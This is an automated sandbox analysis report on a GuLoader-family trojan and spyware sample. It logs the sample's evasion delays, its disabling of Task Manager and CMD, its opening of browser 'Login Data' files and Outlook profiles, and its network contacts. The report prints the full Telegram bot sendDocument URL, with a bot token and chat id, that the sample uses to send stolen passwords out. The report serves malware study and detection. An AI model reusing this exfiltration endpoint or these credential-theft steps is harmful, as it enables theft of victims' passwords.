            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597907s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -597079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596305s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596201s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -596094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595983s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595871s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -595032s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -594087s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -593875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,3_2_00405846
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_004027FB FindFirstFileW,3_2_004027FB
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00406398 FindFirstFileW,FindClose,3_2_00406398
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599500Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599374Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599081Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598909Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598768Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598532Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598407Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598282Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598032Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597907Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596305Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596201Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595983Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595871Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595532Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595032Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594563Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594203Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594087Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 593875Jump to behavior
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.0000000004107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeAPI call chain: ExitProcess graph end nodegraph_0-3933
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeAPI call chain: ExitProcess graph end nodegraph_0-3752
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00403C41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,LdrInitializeThunk,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,LdrInitializeThunk,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403C41
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess created: C:\Users\user\Desktop\m0CZ8H4jfl.exe "C:\Users\user\Desktop\m0CZ8H4jfl.exe"Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Users\user\Desktop\m0CZ8H4jfl.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00406077 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,LdrInitializeThunk,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m0CZ8H4jfl.exe PID: 7628, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m0CZ8H4jfl.exe PID: 7628, type: MEMORYSTR
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m0CZ8H4jfl.exe PID: 7628, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m0CZ8H4jfl.exe PID: 7628, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m0CZ8H4jfl.exe PID: 7628, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            m0CZ8H4jfl.exe72%VirustotalBrowse
            m0CZ8H4jfl.exe61%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.telegram0%Avira URL Cloudsafe
            https://api.telegram.orgt0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.110
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.161
              truefalse
                high
                reallyfreegeoip.org
                104.21.96.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comm0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgtm0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.telegram.orgm0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003489B000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034887000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/1Wm0CZ8H4jfl.exe, 00000003.00000002.2637853910.0000000004118000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botm0CZ8H4jfl.exe, 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsm0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/m0CZ8H4jfl.exe, 00000003.00000002.2637853910.00000000040A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/8.46.123.189ecm0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegramm0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://reallyfreegeoip.orgm0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgm0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347C1000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.comm0CZ8H4jfl.exe, 00000003.00000003.1863100146.000000000411F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.comm0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorErrorm0CZ8H4jfl.exefalse
                                                        high
                                                        http://api.telegram.orgm0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034985000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034BD0000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C7000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000349C3000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034A2A000.00000004.00000800.00020000.00000000.sdmp, m0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namem0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndnm0CZ8H4jfl.exe, 00000003.00000002.2660261583.0000000034C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://drive.usercontent.google.com/xWm0CZ8H4jfl.exe, 00000003.00000002.2637853910.0000000004118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://reallyfreegeoip.org/xml/m0CZ8H4jfl.exe, 00000003.00000002.2660261583.00000000347F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                142.250.185.161
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                193.122.6.168
                                                                checkip.dyndns.comUnited States
                                                                31898ORACLE-BMC-31898USfalse
                                                                104.21.96.1
                                                                reallyfreegeoip.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.185.110
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1587963
                                                                Start date and time:2025-01-10 19:54:34 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 34s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:m0CZ8H4jfl.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:d279cafd050cd071af764df4cc856e9e188ce0c920d13429a3b33129c7e4cee2.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@6/5
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 93%
                                                                • Number of executed functions: 150
                                                                • Number of non-executed functions: 95
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
